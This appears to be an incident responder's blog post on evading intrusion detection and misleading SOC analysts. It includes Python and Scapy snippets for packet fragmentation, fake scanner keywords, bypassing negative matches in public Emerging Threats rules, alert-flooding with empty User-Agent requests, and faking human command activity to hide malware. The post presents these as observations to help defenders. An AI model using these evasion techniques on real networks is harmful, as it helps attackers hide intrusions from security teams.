There are various methods and techniques to evade detection by an IDS. If you know how the SIEM in a network works, you can also adapt your attack so the target doesn't detect your moves. But this post is the first of a series in which I want to share my (only) 3 years of observation and experience as an Incident Responder about how to avoid being detected by a Security Analyst / Incident Responder, rather than by the security system itself. Most of the time, tricking the investigator is far easier than hiding from a security system. While most of these analyst-generated false verdicts could be prevented by better rules, higher-quality training and continuous feedback, they remain a relevant problem.
IDS Evasion
First of all, here are some well-known IDS evasion techniques. In this post I'm not going to go into details; I only want to point out that tricking an IDS is not a trivial thing to do. It is easy to see that one has to have deep technical knowledge to come up with a new method for staying undetected, or even just to use one of the known techniques.
- Encoding / Obfuscation / Encryption: These are three different methods, but all of them are used to change the original packet/content so the IDS cannot understand and evaluate the packet or file. This also means the target system has to be able to translate the packet, so either the attacker already has to be present in the target environment, or he has to use an Encoding / Obfuscation / Encryption method which the target supports but the owner of the system has overlooked.
- Denial of Service attack: Every IDS works differently when it is overloaded. In some cases, the IDS will simply forward a packet if it does not have enough resources to examine it.
- Polymorphism: If the pattern matching is strict, a small change in your file/packet can successfully evade detection.
- Fragmentation: This method splits the packet in a way that every individual fragment is recognized by the IDS as clean. Many IDS systems won't or can't reconstruct the original message and therefore can't inspect the complete malicious payload. The fragments are put back together on the destination system, where the payload can do its job undetected (by the network IDS); see the sketch right after this list.
- Overlapping packets: Sending overlapping TCP packets. The trick is that the IDS reconstructs the stream differently than the target does, so to the IDS the traffic looks benign while the target still receives the malicious content.
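To make the fragmentation idea concrete, here is a minimal sketch using Python and Scapy. The payload, target address and fragment size are made up for the example, and a real attack would of course need an established TCP session; the point is only that no single fragment contains the full suspicious string.

# Assumes Scapy is installed and the script runs with raw-socket privileges.
from scapy.all import IP, TCP, Raw, fragment, send

# Hypothetical malicious request; "exploit=yes" stands in for the string
# a signature would match on.
payload = "GET /exploit=yes HTTP/1.1\r\nHost: www.vulnerabletestsite.net\r\n\r\n"
pkt = IP(dst="203.0.113.10") / TCP(dport=80) / Raw(load=payload)

# Split the packet into 8-byte IP fragments. An IDS that does not
# reassemble fragments never sees the complete "exploit=yes" string,
# while the destination host reassembles it and processes it normally.
for frag in fragment(pkt, fragsize=8):
    send(frag, verbose=False)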
This was just a short list, but one can see that these are really technical methods. Some of them only require basic knowledge, while for others the attacker has to know how networks work, how an IDS behaves in general, which IDS is in use, or needs even deeper internal knowledge about the targeted end-system/company. On the other hand, tricking the analyst who evaluates the generated alert can, in many cases, be done with far less knowledge.
Evade the analyst
In this first post I want to focus on the trivial tricks and save the more advanced or interesting observations for a later part of the series.
1. Keywords for scanning
Internal scanning activities and hardening scenarios aren't unusual at big companies. Sometimes these scans are done by an internal team, other times by external companies. These scans can generate a lot of traffic in the network, and since they contain exploits and malicious content, alerts will be generated as well. These are not true positive alerts, and they should be prevented from appearing on the analysts' console.
What can a company do to eliminate these? If well-maintained network hierarchy documentation is available, it can be used to filter out the IP addresses which are going to be scanned, or the known scanner IPs. Unfortunately, the number of IT devices is growing fast and a great deal of companies can't keep up with the changes, so much network hierarchy documentation is insufficient or doesn't even exist. Even when there is proper documentation, sometimes the security team doesn't know where in the network the alerts are going to be raised. The network can be huge and tricky, and a packet can change its IP addresses along the way due to load balancers, concentrators or NATing. Sometimes it is not the original request but the response that is caught by the IDS, so even with known scanner and target IPs the packet can contain information which is not predictable, or at least not trivial. For these reasons some companies put keywords into the scan packets, which can then be filtered by the IDS, by the SIEM, or in a worst-case scenario by the analysts; this approach is easy to use for internal and external scanning alike.
Let's say the company uses an imaginary scanner named RandomScanner for internal scanning and puts the string 'RandomScanner' into every packet to indicate scanning activity rather than a real attack. In some networks, every scan attempt which contains this string will be suppressed and no alert will be generated. In other cases, the handling of the scan is not automatic and is done by the analysts. The employee has to be really well-trained to determine whether the given string appeared in the packet to indicate a scan, whether it was put there by an attacker, or whether it is just a coincidence. Putting the string into the packet as a malicious third party is not that complicated, and it is an even bigger issue when a request or response accidentally contains the given words, which makes the analyst believe it was just a scan.
Here is an example of the latter case, which could have been eliminated by proper training or the right company culture:
An exploit targeted a website which had the debugger/developer mode turned on. After the exploit was executed, the website showed an error message. It was pure coincidence that one of the modules used on the website had the same name as the vulnerability scanner we used internally. So after the exploit attempt the site responded with something like this: "Loading the module RandomScanner failed." along with some other pieces of information. When the analyst checked the response packet, he saw a module name that looked like the name of our tool, so he happily closed the alert as internal scanning activity. While the exploit was unsuccessful, this is still a miscategorization.
To pull this off deliberately you need to know a keyword that is used in the network, which requires some internal knowledge. On the other hand, you can put any message into the packet for the analysts, like "Company ordered scanning activity", and if you are lucky they will take it as a valid marker. An attacker doesn't have to evade the IDS at all: the system will detect the traffic and an alert will be raised. However, the typically overloaded analysts are going to close these alerts and move forward. So as an attacker you don't even have to deal with the technical part; you can focus on the human weakness of the operation.
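As a sketch of how little effort this takes, here is a minimal example using Python's requests library. 'RandomScanner' is the imaginary keyword from above, and the target URL and the choice of header are made up; the idea is simply to make the malicious request carry whatever string the analysts (or the suppression logic) associate with an authorized scan.

import requests

# Hypothetical target; 'RandomScanner' is the imaginary internal keyword.
headers = {
    "User-Agent": "RandomScanner - Company ordered scanning activity",
}
# The actual exploit attempt travels in the same request as the keyword.
requests.get("http://www.vulnerabletestsite.net/?exploit=yes",
             headers=headers, timeout=5)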
2. Abusing rule (mis)configuration
Let's start the explanation with an example which can help us understand how someone could make mistakes during rule creation. The rule below was created by Emerging Threats and is available for free to everybody: https://doc.emergingthreats.net/bin/view/Main/2013138
Here is the Suricata rule itself, copied from the link above:
alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"ET MOBILE_MALWARE XML Style POST Of IMEI International Mobile Equipment Identity"; flow:established,to_server; content:"POST"; http_method; nocase; content:"<IMEI>"; http_client_body; nocase; content:"<|2F|IMEI>"; fast_pattern; nocase; http_client_body; distance:0; content:!".blackberry.com"; http_host; content:!".nokia.com"; http_host; content:!".sonyericsson.com"; http_host; reference:url,www.met.police.uk/mobilephone/imei.htm; classtype:trojan-activity; sid:2013138; rev:9; metadata:created_at 2011_06_30, updated_at 2011_06_30;)
Let's focus on the negative content matches in the rule:
content:!".blackberry.com"; http_host;
content:!".nokia.com"; http_host;
content:!".sonyericsson.com"; http_host;
This part of the rule means no alert will be raised if the host in the packet contains '.blackberry.com', '.nokia.com' or '.sonyericsson.com'. It works correctly this way, but what happens if someone writes a rule and uses the 'http_header' buffer instead of the 'http_host' buffer? In that unfortunate situation, every packet which carries one of these strings anywhere in its header, for example in the User-Agent field, will evade detection. And we all know that an attacker can shape his outgoing packets however he wants to.
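To make this hypothetical mistake concrete, here is a sketch in Python of a check-in that would slip past such a miswritten variant of the rule. The C2 URL and the IMEI value are made up; the body satisfies the rule's positive content matches, while the '.blackberry.com' string planted in the User-Agent would defeat a negative match that was mistakenly evaluated against http_header instead of http_host.

import requests

# Hypothetical C2 endpoint; the body contains the <IMEI>...</IMEI> pair
# the rule's positive content matches look for.
body = "<IMEI>123456789012345</IMEI>"

# If the negative matches were on http_header instead of http_host,
# planting ".blackberry.com" in any header would suppress the alert,
# even though the Host header points to the attacker's server.
headers = {"User-Agent": "Mozilla/4.0 (compatible; .blackberry.com)"}
requests.post("http://c2.example.net/checkin", data=body,
              headers=headers, timeout=5)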
The rule above wasn't written for a specific exploit, but one can easily imagine similar mistakes, and thus similar evasions, in other rules as well. Here is an example of exactly this, also by Emerging Threats (https://docs.emergingthreats.net/bin/view/Main/2024931). I only copied a small portion of the rule:
flow:to_server,established; content:"User-Agent|3a 20 0d 0a|"; http_header;
content:!".mcafee.com"; http_header;
Given the (partial) rule above, traffic like the request below won't be recognized as an attack and will reach the network without raising an alert. The empty User-Agent header satisfies the positive content match, but since the negative match is evaluated against the whole header buffer, the '.mcafee.com' string planted in the Referer header suppresses the alert:
GET /exploit=yes HTTP/1.1
User-Agent: 
Referer: http://www.mcafee.com/
Host: www.vulnerabletestsite.net
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
This is a problem especially when unqualified internal parties can tune the rules without supervision. If an analyst can fine-tune a rule without knowing how to do it properly, he can put a tool into the hands of the attacker. Also, analysts tend to overlook small details like buffer selection and conclude that the rule generated a false alert by mistake.
So if you, as an attacker, know that a string appears in a negative content match of the triggering rule, you can just put that string into your packet. Even if the rule still triggers, there is a chance the analyst will think it's a false alert, either because an incorrect buffer was used in the rule or because the analyst doesn't have the knowledge to understand the rule itself.
Also, be aware that ET rules are public, yet lots of companies use them. This means rules which a company otherwise keeps hidden can be known to an external party without any effort.
3. DoS the analyst
The list above mentions DoS as an IDS evasion technique. DoSing a system with a volumetric attack is not that easy, because you have to overload a system which is designed to handle a huge amount of traffic. The analysts and incident responders, on the other hand, are not prepared to handle a comparable amount of alerts. An attacker simply has to choose one or more rules he wants to trigger and generate a lot of traffic which is harmless but still triggers them. This way the analysts will be busy working through the alerts one by one and won't be able to handle all of them properly and with enough care.
Using the already mentioned ET rule (https://docs.emergingthreats.net/bin/view/Main/2024931) as an example: every packet with an empty User-Agent header (the content match 'User-Agent|3a 20 0d 0a|' is the hex-encoded form of 'User-Agent: ' followed by CRLF) which does not contain the hosts from the negative content matches will generate an alert. One can simply use a web spider to collect valid URLs, subdomains and pages, then send GET requests towards these sites to generate a great number of alerts. An attacker can easily hide an exploit or any attack in one of his packets, and due to the high volume of generated alerts it will be hard to distinguish the bogus traffic and alerts from the real ones. An analyst will only be able to find the real attack in a timely manner if other rules also fire on the exploit.
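Here is a minimal sketch of such a noise generator in Python. The URL list is a placeholder for what a web spider would have collected beforehand; every request goes out with an empty User-Agent header, so each one satisfies the rule's positive content match and lands as a separate alert on the console.

import requests

# Placeholder list; in practice a web spider would have collected
# hundreds of valid URLs, subdomains and pages beforehand.
urls = ["http://www.vulnerabletestsite.net/page%d" % i for i in range(500)]

for url in urls:
    try:
        # Overriding the default User-Agent with an empty value produces
        # the exact "User-Agent: \r\n" byte sequence the rule matches on.
        requests.get(url, headers={"User-Agent": ""}, timeout=3)
    except requests.RequestException:
        pass  # the alert fires on the attempt; failed deliveries don't matter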
The attacker can use other tricks as well, like changing his source IPs and targets, or triggering multiple rules instead of just one. This way he can prevent the blue team from building a tool or script for quicker analysis: if there are too many variables, it is much harder to automate the evaluation.
This whole method works because people tend to lose concentration when they have to do the same boring task over and over again without real results. A huge amount of benign traffic can trigger this effect in the analyst, who, as a result, will miss the real, malicious alert as well. The first alerts will be investigated properly, but over time people put less and less effort into similar, generally false-positive alerts.
4. Recognized human behavior
There are plenty of cases when it is hard to decide, based on the provided information, whether an executed program is malicious or benign. When a program executes a series of commands in cmd, PowerShell or bash, its activity can sometimes be easily distinguished from a real person's behavior.
A good example: malware generally tries to stay low and make as little noise as possible, so it won't run any unnecessary commands. A normal person, on the other hand, uses the help switch or the man page of a tool, and makes mistakes. These differences can help the evaluation of an alert, but malware can also exploit them to fake a human identity and hide.
Even when the information is insufficient, the analyst still has to decide whether there is a real infection on the machine or it is just user activity. If the above-mentioned behaviors occur, analysts tend to believe it is just a normal user action due to their bias. This way they can be tricked into making the wrong decision.
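As a sketch of how malware could exploit this bias, the snippet below (Python, Windows commands assumed, the payload itself omitted) interleaves a help switch, a typo and human-paced delays before doing anything else, so the recorded command history looks like a clumsy user rather than an automated tool.

import random
import subprocess
import time

# Commands a real, slightly clumsy user might type: reading the help,
# making a typo, then getting it right. The typo'd command simply fails,
# and that failure is part of the disguise.
human_noise = ["ipconfig /?", "ipconfg", "ipconfig /all"]

for cmd in human_noise:
    subprocess.run(cmd, shell=True, capture_output=True)
    time.sleep(random.uniform(2, 10))  # humans don't type at machine speed

# ...the actual malicious activity would only start after the noise.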
Real-life example:
During one of my investigations I realized that the alert I was dealing with had already been closed multiple times in the past. It had been closed as a false-positive detection because of a small portion of the executed commands. The two commands which made the analysts believe it was a FP were an ipconfig execution followed immediately by an ifconfig execution.
Due to their bias, people closed these alerts because when they saw the two commands they assumed somebody had accidentally executed the wrong one first, and they believed a virus wouldn't make a mistake like this, since malware tends to minimize its footprint to stay in the shadows. This assumption is not necessarily correct: the activity could just as well have come from a tricky piece of malware (or from an attacker on the machine, but that is a different situation).
What was initially missed is the fact that the very same command mistake had been made in the same context on different machines in the past too, which means it wasn't one specific user who simply made a typo. Once I found this information, it looked much more like some automation tool or even a real infection, and definitely not a one-time, manually made mistake.
During the final investigation we found out that an administrator had used the two commands to make his script work in Windows and Linux environments alike. Instead of checking which OS he was on, he relied on error handling: the non-existent command was caught by the error handler while the existing one executed successfully. A script which was designed as a small test script was later copied and re-used in the production environment, which caused our alerts. On the other hand, it could just as well have been a poorly written piece of malware, and it would have been closed as a FP all the same.
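Here is a reconstruction of what the administrator's script might have looked like; this is my own sketch in Python, not the original code. Instead of detecting the OS, it tries the Windows command first and lets the error handler swallow whichever command doesn't exist.

import subprocess

def get_network_config():
    # Try the Windows command first, then the Linux one; whichever
    # doesn't exist on the current OS raises and is silently skipped.
    for cmd in ("ipconfig", "ifconfig"):
        try:
            result = subprocess.run([cmd], capture_output=True, text=True)
            if result.returncode == 0:
                return result.stdout
        except FileNotFoundError:
            continue
    return ""

print(get_network_config())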
Note:
I changed the real-life scenarios enough to hide any internal information about my current or previous employers. In this post I talked about IDS systems, not IPS systems, so evading the security system itself wasn't necessary. It has been my observation lately that security analysts are heavily overloaded, often inexperienced and undertrained, and sometimes whole security operations centers are understaffed. In my experience, tier 1 analysts in particular lack the time for a real investigation of every alert: they quickly have to decide whether to deep-dive into a detection or close it fast and move forward.